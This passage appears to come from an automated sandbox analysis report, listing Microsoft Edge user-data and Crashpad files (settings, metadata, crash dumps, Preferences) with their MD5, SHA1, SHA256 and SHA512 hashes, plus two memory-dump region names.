| SHA512 | 2a0ebe7c4b34544899c0e9afda4494fd605310b7cac0285023b9458fbaa2a6eb3c94b84b91f91d1c44a5cc99ccbcb7851edf9a9500717a4b7c8103e7a19d2416 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d481eba96b5274dc992285a30acbca11 |
| SHA1 | 8c7f4034b3a942d983a2ce162060a28b07dac6a4 |
| SHA256 | de0cde55440fec5dc1a16e74f405e7973642a720a4ddfd51036f664a9280e870 |
| SHA512 | 957f149d3c60f93a7c873ee43dbef809f945ea9d6beaa4199d8797b9029a6333df3406921fb096712fde1b0068540a604e1f3215c9ddce71088d129ca0c17802 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d82fc7b63610132e6668a26f74aa0c1c |
| SHA1 | 22de9828de506bce53c7fa6fcd0d47b252147dc8 |
| SHA256 | 75352e3e5cde0021af56b8a7655ba68226e9423fcb2cf3c5b81554227517839d |
| SHA512 | 3a3f9fb940659ce21babcb435bf27e7b5453f08a7435d64c2c2c6a6287b79bd1db7cef55f973cb588b404c05034f54787d744b421509c55134e164b8d0935e69 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1de1776d-ed82-4c02-9efe-c79b6ff04150.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c069f329ccded117d76eacdeda3a2da7 |
| SHA1 | d5163d692d08cd325c94bfa9df8fddc05a560098 |
| SHA256 | a5fe35721885a7010ff34820498ea227c027c9aa76f1d88f84c30af39c82e795 |
| SHA512 | 9173c2c9c4a59c1fbd53d57ede4fada23dedc9e7e3695004d417fe97c760492ffa48e296df993255b00cae6268206337daacf3afde3c28a78a092865c929a8e8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 42dc88277a574d4b272434c3306229ee |
| SHA1 | 4d61f91af1c55c22f4d452b224e91b47056f5d83 |
| SHA256 | 69c0ae205c3d49f59947cd61fa2eea3e5a7c6e05fc7bbbe87f3a934eef6e5810 |
| SHA512 | 4e5a74f8bbe04ebc1f882a9cacb8ad63922b7fa4c6e93ab7eeec72586352d630e7b37e35433011857e256a2736bb41417cf2c11097c506d688d7d94aaee0f54d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\f3a2f67a-a0c1-4efc-83b2-56c9b7cc1d77.dmp
| MD5 | 21d9dd55a9758f58e0d352c7a611aae0 |
| SHA1 | 4099d022dc8c98d7b944dab388e30bb6a4d9a6a7 |
| SHA256 | c13a6e5aefc403074d6dcf472c376b183a98c8706ca2e971710438544d7c99df |
| SHA512 | b1c894cc15bb12569b36d88dfb970fbb9b9746de46a2e3d8283f7703415a0e2bb4c5e8f4c00c64f3c1769d231f6eeb53892a34aa88da83c4e62e16e0babd2b3f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 60db5128b0a7a90ad89815b4cfea0788 |
| SHA1 | efe4607904a8f05de788a2e4d76d8475a001c9c5 |
| SHA256 | 09b2bb18cb5f2f0559a7a1222130f074545fd88e8b2afb031a018df33e97a45f |
| SHA512 | d187ea763cd19309bc8e76ce0379c2df205d37c287608fa384d90392668292a71b1289a70101ee017477713c66863d14559ec8517672add9bae690bf8e5aebe4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\97790bdd-d0c7-4759-8fde-1bb1eb2180f2.dmp
| MD5 | 8e68c37b4d8da0eb2559e0b52084201a |
| SHA1 | e62515833cc119bbae9ef1569c48823f6660d772 |
| SHA256 | e2c76687d5cd768a59ecfa667cf8386dbd3ba6e91754a19f11470059160eb901 |
| SHA512 | bbc4c7b4b055bb4ac7e5585c1577585c2819c11413bc6ea5022255f90131100cec634f71857f07d74896320c1ea8a85090334fdba64f5327c5287e788a3547dc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 52948d7c448f2cfc2f85737d317034a0 |
| SHA1 | 3819166e20d990f325e2124e6ef417263648ec04 |
| SHA256 | aa61de25a49e242511d2458c8c73ade2be9e41e60b1f6ad68ffb46e9cfd0a545 |
| SHA512 | d323b061a3d422cd9d671414e48b38797a1973d7807a4bf34f8914422db96bbafa8973e4819b9a3cdb357da7ff906c1570acfb091dc568f5ff13b79e9e1b218f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\ee085762-bdd6-4bd5-9199-2ba12d74e1ed.dmp
| MD5 | 54be485c85fea96485fb84304caf4cd6 |
| SHA1 | 071273e65fc5a8b52e1baad3e286cd0fc3e51970 |
| SHA256 | 68e01d49f1a8a7f789e025ddeb0aa41fa0fcde6c8a786493225d502db2eb17f3 |
| SHA512 | 3d38bda27d79c71b5c9b6ade5200ae8fd8642fed537753c3b1af87f6ca7c331a879c36a04f27ce6894ed9500dab55526ec7a1a1ad0a3103904760f58b47409f3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d41eed92f4d58a3df17cc42af495356b |
| SHA1 | 0d0c84334f2b183a51eeeff95bc6f91d524b9e21 |
| SHA256 | fcacc9d97ddd4d8ff335837178fec29c7aff4200e98245e247ef657d3317d8b8 |
| SHA512 | 6ce6ed8e1282c8549ab9f441904d72270b957b33c065e67cb41cd5785b3faf1826c385b9a31d65db3a8e2044f1c3536af7f68d1b50fe2e043b70395928f2a7b1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | a218e0b8623ecf4c1b9c5a5c37fe48d8 |
| SHA1 | ad6e24a1e9d8b9a9dc82acc2aa3b746f140b0121 |
| SHA256 | 0848e751531ca3e3b6bd797d9dfcc5ea1efff50553f39072fa44e941c5e68020 |
| SHA512 | 53eebc083e8faa6e55a86f004552e62575850f5c04001de39f42f565610a68e23606f70b009c878cea436a5f7b4e4658c9f04e21d01c48ea19c4bd286eccb362 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\8e21fa6b-7ead-4766-bba3-84a5d8238943.dmp
| MD5 | 93d13585637ac48905e86b568cd8be6a |
| SHA1 | 30526954e37f20a9da7293f13e55102f65e6dcbf |
| SHA256 | 7995f0381294d295cad0190962b6a4fd341455638371b7afac6cbf982ef9176b |
| SHA512 | 2054cd077a1e0cb62f3f2ec353b82beac20be64ca067542a7510d276f1457713e433d940835a5bbc641cb4789190db3b0c35270f3abb4daf3aa09926b8657b08 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 4fd90550eb37ea7fc7455f1fd0fa912b |
| SHA1 | fdfd3d3e64f7213d52ad1ab5486cf57e917df854 |
| SHA256 | ad897daa3f88df25571de10f4557f543f6555065083e33b65da0b4243b8c0fa8 |
| SHA512 | 33288ad912a87f11ac732589191afe7dd22b61356e8318f64073c3dc7b7cb5ed8182e2efdb58a40daf5e1360f2c2b6cb8935f20fc4939e6124707226cf2ac247 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\7b31eace-96b0-47fd-abc2-a938c5ab6f5f.dmp
| MD5 | 5e3e1636247566f1a9e46dcd4d08d1a6 |
| SHA1 | 65757d0d43accca65922cbd96ea8b4ba577e906d |
| SHA256 | cb6a323c0893617039fe72f6da5e7531598bc689303087796269c56a5c41bc69 |
| SHA512 | 622f71a9c72367f91835430c4274c7bfdfce887d5f71ec86cc3a66e279ad79e57235496ca4510b042accc9968395544443e289f5ccc1c749371a251191a8d901 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 912c1b9a690dd05db0ccaa7970777f3f |
| SHA1 | 8d660e2c8983394eab804dd09e38b670d067de8c |
| SHA256 | 61e742c6d187efca4ca6a64ed88f212d7bab658bbc87c803d47e56a17773ed82 |
| SHA512 | c081806a9891aad021b61589ca59cd4c61defc133c7da4405c391ac287c1b51e8c501eebd99812ad38cf0ce490a377750a2d336f55a727c9f32da2985492d42d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\d9824924-d9fe-4e69-aa1d-f1ad1a0dbf45.dmp
| MD5 | 2861ce3226f7b856bd8143af13670fa6 |
| SHA1 | 8c9d85a604db6b664f0ce18a4eebca8cf6b748db |
| SHA256 | af9480e376d44544f976bd61cd6148c2c41ffc8535e0391211909d7f3f164e0c |
| SHA512 | b772137ec620570968517cfa859c47d039fdb480150a62b723548d0dd9bdd35189ea6639b2fb609b1c41ea8943de16513f2d01690a4a0ee60f24527b5a582b32 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | eb92a328fd7cd9a75e48b44f4bb44308 |
| SHA1 | 355ea2fbb1e857a81edc941a89d4c561890e0bc2 |
| SHA256 | cae2a74809a45024ad3a78f49cc5d40954eeed22db4154669696c78e925fbd65 |
| SHA512 | 3117233f02358f3ecba9d5f0c2b1c73fec3f8deaf8b8e9d37a6d89dbff53a8c03e3d21027dac81fdc7be94748d5406f01c3ad0ae77770c72c342ebc3ffe5bf89 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 06b6f22f886812f14e0eb3e880e42b35 |
| SHA1 | b9d235c1a0c795ca1184e7236041c39a42f69580 |
| SHA256 | 11b9029764ccc34b1cde6c368510bf2aa5e9540f4b0598d4fe3291095934a989 |
| SHA512 | ee003860c302b2a0772ce5b2079a4db32772daf84385c751e098dda09e9730905ab390783377734f79ef4781573701328c2199ef3fc5138de2409ad63c0ebfa8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\0ef9678e-5b9a-444a-b67b-2f1da524e926.dmp
| MD5 | 1222db2c0afe79e11389b8d49ff416fa |
| SHA1 | 64ff46e19b6205981a6489f3a9b1d445ecd07711 |
| SHA256 | 7fadcc2b797511bc24a4be721e4ade5d36643483bffa77be2f35d7b86f3ff91c |
| SHA512 | f762a7bd6da71ba3d4f07d721f93c9882e3d83089590b201c1e9678b0e91f0a40e864ea802a8aaa022dc8e815fd813f23ceff9a1414f12e226025b92c96a4b18 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\c4d2c004-f463-4ea0-bcd8-4cfd3dc20522.dmp
| MD5 | 925ed65271c895b2b44bd92b810edce0 |
| SHA1 | 3d98262096e70562d21b1301f7743d893613156d |
| SHA256 | c267eedca2a137904ef2f0911fb36b9bf340f8e1ba45b94219ddcb6a86a4df9c |
| SHA512 | d085936a42e334029524ce9db7f019fb813634d39965e5f525ef3c6cb2e32d318bea5e8a0715eb570c02c2609b5cf0d017fa18932b01440687fa915f808ac92f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | fe675660c9f79754482dc11ef1f3aac6 |
| SHA1 | be137787d26e7ea43ecfd2a4f036b3ac0e0fbd8b |
| SHA256 | 64557977db988b42906361dd3f484124ed1b9bb458d454e2971ffc1fc3a767ac |
| SHA512 | 0b07e8bb227b551aca29b78fba21c9906b0b3d5bd1f52cd0a825c8d50e7aa12afaa3a111f642223f4c78ce73dd57c31fff4ab88f51052e256b5e94ef1633eb95 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\2b08fdd6-cc78-4223-ac01-757221ff5d1b.dmp
| MD5 | 3613e381b60e8477348f46e4627ee11d |
| SHA1 | 0ae896ff91c2770e3dec92e0d4658517f076073f |
| SHA256 | 6c42fd4db6ff22734ef856780eb6f0b185719ba99073de50f388dc17b0d07e1f |
| SHA512 | bd92f66652933355ea5e7857d757a46f512468b02a3819b6e8291808afc25ebffb76a9cb3fc320defae57d35d6df95427658c770819b3d339080d1c9281412a4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5fbbcf5e98501ad643a916b251fccec9 |
| SHA1 | c66bc75e8bfaf678031c732b8f72d1c76d63212d |
| SHA256 | 3cbb00709b5fbbc40ab639da142a96435ec0c1d511bec16d3d05db3661fe3c22 |
| SHA512 | 356cff1a875a4aa789dd4c4f36112f1265febf636bfdc3c25801555eac81a11c56662fac78f190268602bac5f5be18e3217f128bf6fb6d2cce2d13e13e5e574a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 88d3670aedd9c4f2d5b5644d34bdbc03 |
| SHA1 | 19b1b93f3cccc68acf47ce50469e4a3aaa8d6669 |
| SHA256 | d7188a8bffc744af0e84f9e2e75caa9d037ab25520f05aef2a063bd2c67b8c4f |
| SHA512 | d805450c13de2cd8c1703ab8e139193d53a357691072cd5d0b5cfa1c882f10b2c6c11cc49f2f38836c24c294524542b6a13aa7b9c4f1b156d631b2c4cf9f769e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b9c1177a-17b9-4ce1-9ad3-bd45e86dba09.dmp
| MD5 | 0e6995f4af6c8417268a3b6f12e6399f |
| SHA1 | 38b5dd97e70d2340c4dbaa2dd9f42eef8f7e2c43 |
| SHA256 | 0dc4279ff7b174331e349e7a3fe60ff9d2cdb735db903c01e44f2b7845a9ca58 |
| SHA512 | 848aafec47e6d5b6a0df4a24bc3c436047936f6e79c0f25a7010d2280bb4e09d6bef469b8476f0ce7ba21f6158638e3314859ef701fe8030d188c431392a46b8 |
memory/5436-1698-0x0000000000E90000-0x000000000134F000-memory.dmp
memory/5436-1701-0x0000000000E90000-0x000000000134F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d20a0ff6fb738451151f0192df996bca |
| SHA1 | 6928c8adac56a75c28d369ce0647bf99954652d3 |
| SHA256 | 029476e4619860fa0238a31cbd06d591a57c28824f7041f57e6a3263a2dfbaa9 |
| SHA512 | 75454753274c11b5d1242a886a5222f220189609bcaba05a8042b57e3223a3a80b812f7e9bcb0ea18e7bbaad4a5cc00f539f8bd05842a7a44ef034546e0102c9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 514c89e4bb6e6e0b609ad9b19fc13d64 |
| SHA1 | 157cccad482d3d2e6e57008c2612e71388d7d8a2 |
| SHA256 | d1796a948b3fc46d60d15b6e3efa88e25e002ca509ac1bb007739cd18a0ced61 |
| SHA512 | 138cfcf3195fac4f9422bd4b545cb40694e1677185c2f0f934163b454d68d3195a5b090c867c15cb49cc1b02831863ac09e1f53843b9f403a709bb767cc0e443 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 61f96367ad64c5482240b2d6a63ca5e7 |
| SHA1 | 24ba0f2ac372fef03d079f354b9a3c5ff08cb4d6 |
| SHA256 | e2b0a6555803ee15267484c8065f4d2ba6155ecfe18e9fc8a807533b05b8bbb3 |
| SHA512 | e6d336f96fcc3ac3b6d9b7e89205f99de0a3baec63fec63ea668213b6d494d4dbe110aa2a7f424edf5a71b4928f1792e2e1b79f5f8ee2d9c9ec8c3420e1741b0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\af1d4bba-8dee-4f41-a7e6-8c227364f1f0.dmp
| MD5 | 6cf6119af132603f0912f92cc882c7c4 |
| SHA1 | 8bfbefb8902d10932d3c9d50ed217ee9ac47b384 |
| SHA256 | b578a8b8ff1f909bdba66674e93dfd57b9c39c6c00244da9b25abbadeaaa44ca |
| SHA512 | b4bd9ca04d7756623d23775b324e364991fbaeb52c7f4b9ad81e7bb44e832c1a0c8731efc19d95758131b420d1d81a73d39a819ea4b819e1b0c77bde147d34b3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 646a45bb676278e3aeae9548b61b3428 |
| SHA1 | ba5cf8e031611d2200f8422554519bf636bee191 |
| SHA256 | dc97b68364174b1da16defb3229ef02752c0e10e3ac1cf81cc85df91ef27be3f |
| SHA512 | 2acf852ff3b6e636fadc9cf27c1b4f39484a0b903fab82af1de2d59c76e4fcc1f94e1d45c890bba38bca78b65234e8328ad7e06e0b52da3a54228fde7f012019 |